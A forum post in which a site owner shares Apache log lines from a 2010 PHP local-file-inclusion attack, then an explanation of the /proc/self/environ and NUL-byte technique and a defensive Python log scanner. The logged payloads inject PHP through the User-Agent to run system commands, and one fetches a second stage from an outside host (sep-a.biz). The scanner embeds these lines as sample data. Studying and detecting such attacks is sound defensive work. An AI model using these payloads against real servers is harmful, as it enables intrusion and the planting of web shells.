I’ve looked throughout the web for a real PHP injection example and a discussion of how it works so I know exactly how to thwart it. I haven’t found it, so I’m going to post what happened to me. Hope there isn’t some etiquette about this, or that this imperils all of us now.
[CODE]
64.120.149.69 - - [04/Jul/2010:13:15:39 -0500] "GET /catalog/?product_id=150824//index2.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 34775 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('ls -al; echo ; exit;'); ?></pre>EXPLORE"
64.120.149.69 - - [04/Jul/2010:13:16:07 -0500] "GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 34772 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('ls -al; echo ; exit;'); ?></pre>EXPLORE"
64.120.149.69 - - [04/Jul/2010:13:16:30 -0500] "GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 34323 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('lwp-download http://sep-a.biz/tools/flash.txt; echo ; exit;'); ?></pre>EXPLORE"
64.120.149.69 - - [04/Jul/2010:13:16:37 -0500] "GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 35005 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPXCWD<?php chdir('19 /home/sbsrus/public_html 1 1e'); ?>XCWDEXPLORE<pre><?php echo system('ls -al; echo ; exit;'); ?></pre>EXPLORE"
64.120.149.69 - - [04/Jul/2010:13:16:58 -0500] "GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 34203 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('mv flash.txt flash.php; echo ; exit;'); ?></pre>EXPLORE"
[/CODE]
I have no clue what the %00 is, but it turns into a weird character in my URL bar, and without it this whole thing doesn’t work. With it, the computer echoes out the user agent string and the PHP code gets executed. The person appended //index2.php etc. etc. to my normal URL stuff. I can’t imagine why doing //index2.php etc. works. There is no index2.php on my server. There is an index.php in the root, but then doesn’t everyone have an index.php in the root?
I thought I’d see if this is especially pernicious by trying this code out on other sites, but then I thought I’d go to jail, so instead, I’m just putting it out there.
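What the log above records is the standard /proc/self/environ local-file-inclusion probe. The path and the junk in `product_id` before `?option=` are just the scanner's request template; what the server actually parses is a query string whose `controller` parameter holds the payload. The vulnerable script builds an include path from that parameter and appends `.php`; the run of `../` walks up to the filesystem root; `%00` is a URL-encoded NUL byte, and PHP builds before 5.3.4 truncate filenames at NUL, so the appended `.php` is discarded and `/proc/self/environ` is what gets included. That file is chosen because, when PHP runs as CGI/FastCGI (the usual shared-hosting setup), it contains the request headers as environment variables, `HTTP_USER_AGENT=` included, so the `<?php ... ?>` in the User-Agent is included and executed. The third and fifth lines then fetch a second stage with `lwp-download` and rename it to `flash.php`. The script below is an added example, not code from the original post: it parses Apache combined-format lines, flags this pattern, and simulates the NUL-byte truncation so the role of `%00` is visible. The sample log embeds two lines quoted from the post (re-quoted with straight quotes) plus one constructed benign request; the base directory given to `simulate_include()` is a hypothetical path.

```python
"""Flag /proc/self/environ local-file-inclusion probes in Apache access logs.

Added example, not code from the original post. The sample log lines are taken
from the post (re-quoted with straight quotes) plus one constructed benign hit;
the base directory passed to simulate_include() is a hypothetical path.
"""
import posixpath
import re
from urllib.parse import unquote

# Apache "combined" format: ip ident user [ts] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# Files an LFI scanner reaches for once it can traverse. /proc/self/environ is the
# one in the post: under CGI/FastCGI it holds HTTP_USER_AGENT=<whatever was sent>.
SENSITIVE_FILES = ("/proc/self/environ", "/etc/passwd", "/proc/self/fd/")
# Downloaders the injected PHP in the post uses to fetch its second stage.
DOWNLOADERS = ("lwp-download", "wget ", "curl ", "fetch ")


def analyze_line(line: str):
    """Return an indicator dict for one log line, or None if nothing is suspicious."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    target = unquote(m["target"])        # %2e%2e%2f and %00 become ../ and NUL
    ua = m["ua"]
    depth = target.count("../")
    f = {
        "ip": m["ip"],
        "ts": m["ts"],
        "status": int(m["status"]),
        "traversal_depth": depth,
        "null_byte": "\x00" in target,
        "sensitive_file": any(p in target for p in SENSITIVE_FILES),
        "php_in_ua": "<?php" in ua or "<?=" in ua,
        "download_in_ua": any(d in ua for d in DOWNLOADERS),
    }
    # Traversal alone is noisy (broken links, odd clients); require a second indicator.
    if depth >= 3 and (f["null_byte"] or f["sensitive_file"]):
        return f
    # PHP open tags in a User-Agent are never legitimate, traversal or not.
    if f["php_in_ua"]:
        return f
    return None


def scan(log_text: str):
    """Run analyze_line over every line and keep the hits, in log order."""
    return [f for f in map(analyze_line, log_text.splitlines()) if f]


def simulate_include(base_dir: str, controller_param: str, suffix: str = ".php") -> str:
    """Path opened by include($base_dir . '/' . $_GET['controller'] . '.php') on a PHP
    build that truncates filenames at NUL (before 5.3.4). Shows why %00 is needed:
    without it the appended .php survives and /proc/self/environ.php does not exist."""
    raw = unquote(controller_param) + suffix
    truncated = raw.split("\x00", 1)[0]                  # the NUL-byte truncation
    return posixpath.normpath(posixpath.join(base_dir, truncated))


# Two attacker lines from the post plus one constructed benign request.
SAMPLE_LOG = r'''
64.120.149.69 - - [04/Jul/2010:13:15:39 -0500] "GET /catalog/?product_id=150824//index2.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 34775 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('ls -al; echo ; exit;'); ?></pre>EXPLORE"
64.120.149.69 - - [04/Jul/2010:13:16:30 -0500] "GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 34323 "-" "Mozilla/5.0 XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAMEXSIP<?php echo $_SERVER['SERVER_ADDR']; ?>XSIPXUNAME<?php echo system('uname -a;echo ;'); ?>XUNAMEXUSERID<?php echo system('id;echo ;'); ?>XUSERIDXPWD<?php echo system('pwd;echo ;'); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system('lwp-download http://sep-a.biz/tools/flash.txt; echo ; exit;'); ?></pre>EXPLORE"
10.0.0.5 - - [04/Jul/2010:13:20:01 -0500] "GET /catalog/?product_id=150824 HTTP/1.1" 200 34775 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''.strip()


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print(simulate_include("/var/www/catalog/components",   # hypothetical base dir
                           "../../../../../../../../../../proc/self/environ%00"))
```

On the application side the fix is not to build an include path from `controller` at all: map the parameter against a fixed list of controller names and refuse anything else, rather than trying to strip `../` or NUL bytes. Upgrading PHP to 5.3.4 or later removes the NUL truncation, which is why this particular payload stops working there, but it does not remove the traversal itself. Since the last two requests download `flash.txt` and rename it to `flash.php`, anyone seeing this pattern should also look for that file in the web root and treat the host as compromised if it is present, because the payload ran as the web server user with `system()` available.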